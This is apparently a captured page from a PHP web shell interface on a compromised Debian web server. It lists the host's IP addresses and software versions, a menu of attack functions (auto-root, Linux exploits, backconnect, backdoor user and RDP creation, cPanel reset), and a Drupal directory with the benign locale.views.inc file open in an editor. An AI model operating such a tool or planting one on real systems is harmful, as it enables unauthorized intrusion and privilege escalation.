Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.135.185.78
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
views /
modules /
[ HOME SHELL ]
Name
Size
Permission
Action
aggregator
[ DIR ]
drwxr-xr-x
book
[ DIR ]
drwxr-xr-x
comment
[ DIR ]
drwxr-xr-x
contact
[ DIR ]
drwxr-xr-x
field
[ DIR ]
drwxr-xr-x
filter
[ DIR ]
drwxr-xr-x
locale
[ DIR ]
drwxr-xr-x
node
[ DIR ]
drwxr-xr-x
profile
[ DIR ]
drwxr-xr-x
search
[ DIR ]
drwxr-xr-x
statistics
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
taxonomy
[ DIR ]
drwxr-xr-x
tracker
[ DIR ]
drwxr-xr-x
translation
[ DIR ]
drwxr-xr-x
user
[ DIR ]
drwxr-xr-x
aggregator.views.inc
12.06
KB
-rw-r--r--
book.views.inc
3.37
KB
-rw-r--r--
comment.views.inc
19.74
KB
-rw-r--r--
comment.views_default.inc
14.23
KB
-rw-r--r--
contact.views.inc
450
B
-rw-r--r--
field.views.inc
18.61
KB
-rw-r--r--
file.views.inc
2.33
KB
-rw-r--r--
filter.views.inc
744
B
-rw-r--r--
image.views.inc
2.31
KB
-rw-r--r--
locale.views.inc
5.77
KB
-rw-r--r--
node.views.inc
24.63
KB
-rw-r--r--
node.views_default.inc
16.01
KB
-rw-r--r--
node.views_template.inc
7.79
KB
-rw-r--r--
poll.views.inc
1006
B
-rw-r--r--
profile.views.inc
5.63
KB
-rw-r--r--
search.views.inc
5.74
KB
-rw-r--r--
search.views_default.inc
5.99
KB
-rw-r--r--
statistics.views.inc
6.35
KB
-rw-r--r--
statistics.views_default.inc
12.89
KB
-rw-r--r--
system.views.inc
19.52
KB
-rw-r--r--
taxonomy.views.inc
17.28
KB
-rw-r--r--
taxonomy.views_default.inc
5.63
KB
-rw-r--r--
tracker.views.inc
5.21
KB
-rw-r--r--
translation.views.inc
3.48
KB
-rw-r--r--
user.views.inc
16.23
KB
-rw-r--r--
views.views.inc
3.62
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : locale.views.inc
<?php /** * @file * Provides views data and handlers for locale.module. * * @ingroup views_module_handlers */ /** * Implements hook_views_data(). */ function locale_views_data() { // Basic table information. // Define the base group of this table. $data['locales_source']['table']['group'] = t('Locale source'); // Advertise this table as a possible base table. $data['locales_source']['table']['base'] = array( 'field' => 'lid', 'title' => t('Locale source'), 'help' => t('A source string for translation, in English or the default site language.'), ); // lid $data['locales_source']['lid'] = array( 'title' => t('LID'), 'help' => t('The ID of the source string.'), 'field' => array( 'handler' => 'views_handler_field', 'click sortable' => TRUE, ), 'argument' => array( 'handler' => 'views_handler_argument_numeric', 'numeric' => TRUE, 'validate type' => 'lid', ), 'filter' => array( 'handler' => 'views_handler_filter_numeric', ), 'sort' => array( 'handler' => 'views_handler_sort', ), ); // location $data['locales_source']['location'] = array( 'group' => t('Locale source'), 'title' => t('Location'), 'help' => t('A description of the location or context of the string.'), 'field' => array( 'handler' => 'views_handler_field', 'click sortable' => TRUE, ), 'sort' => array( 'handler' => 'views_handler_sort', ), 'filter' => array( 'handler' => 'views_handler_filter_string', ), 'argument' => array( 'handler' => 'views_handler_argument_string', ), ); // Group field $data['locales_source']['textgroup'] = array( 'group' => t('Locale source'), 'title' => t('Group'), 'help' => t('The group the translation is in.'), 'field' => array( 'handler' => 'views_handler_field_locale_group', 'click sortable' => TRUE, ), 'filter' => array( 'handler' => 'views_handler_filter_locale_group', ), 'argument' => array( 'handler' => 'views_handler_argument_locale_group', ), ); // Source field $data['locales_source']['source'] = array( 'group' => t('Locale source'), 'title' => t('Source'), 'help' => t('The full original string.'), 'field' => array( 'handler' => 'views_handler_field', ), 'filter' => array( 'handler' => 'views_handler_filter_string', ), ); // Version field $data['locales_source']['version'] = array( 'group' => t('Locale source'), 'title' => t('Version'), 'help' => t('The version of Drupal core that this string is for.'), 'field' => array( 'handler' => 'views_handler_field', 'click sortable' => TRUE, ), 'filter' => array( 'handler' => 'views_handler_filter_locale_version', ), 'argument' => array( 'handler' => 'views_handler_argument_string', ), ); $data['locales_source']['edit_lid'] = array( 'group' => t('Locale source'), 'field' => array( 'title' => t('Edit link'), 'help' => t('Provide a simple link to edit the translations.'), 'handler' => 'views_handler_field_locale_link_edit', ), ); // ---------------------------------------------------------------------- // Locales target table // Define the base group of this table. Fields that don't // have a group defined will go into this field by default. $data['locales_target']['table']['group'] = t('Locale target'); // Join information $data['locales_target']['table']['join'] = array( 'locales_source' => array( 'left_field' => 'lid', 'field' => 'lid', ), ); // Translation field $data['locales_target']['translation'] = array( 'group' => t('Locale target'), 'title' => t('Translation'), 'help' => t('The full translation string.'), 'field' => array( 'handler' => 'views_handler_field', ), 'filter' => array( 'handler' => 'views_handler_filter_string', ), ); // Language field $data['locales_target']['language'] = array( 'group' => t('Locale target'), 'title' => t('Language'), 'help' => t('The language this translation is in.'), 'field' => array( 'handler' => 'views_handler_field_locale_language', 'click sortable' => TRUE, ), 'filter' => array( 'handler' => 'views_handler_filter_locale_language', ), 'argument' => array( 'handler' => 'views_handler_argument_locale_language', ), ); $data['locales_target']['plid'] = array( 'group' => t('Locale target'), 'title' => t('Singular LID'), 'help' => t('The ID of the parent translation.'), 'field' => array( 'handler' => 'views_handler_field', ), ); // Plural $data['locales_target']['plural'] = array( 'group' => t('Locale target'), 'title' => t('Plural'), 'help' => t('Whether or not the translation is plural.'), 'field' => array( 'handler' => 'views_handler_field_boolean', 'click sortable' => TRUE, ), 'filter' => array( 'handler' => 'views_handler_filter_boolean_operator', 'label' => t('Plural'), 'type' => 'yes-no', ), 'sort' => array( 'handler' => 'views_handler_sort', ), ); return $data; } /** * Implements hook_views_data_alter(). */ function locale_views_data_alter(&$data) { // Language field $data['node']['language'] = array( 'title' => t('Language'), 'help' => t('The language the content is in.'), 'field' => array( 'handler' => 'views_handler_field_node_language', 'click sortable' => TRUE, ), 'filter' => array( 'handler' => 'views_handler_filter_node_language', ), 'argument' => array( 'handler' => 'views_handler_argument_node_language', ), 'sort' => array( 'handler' => 'views_handler_sort', ), ); }
Close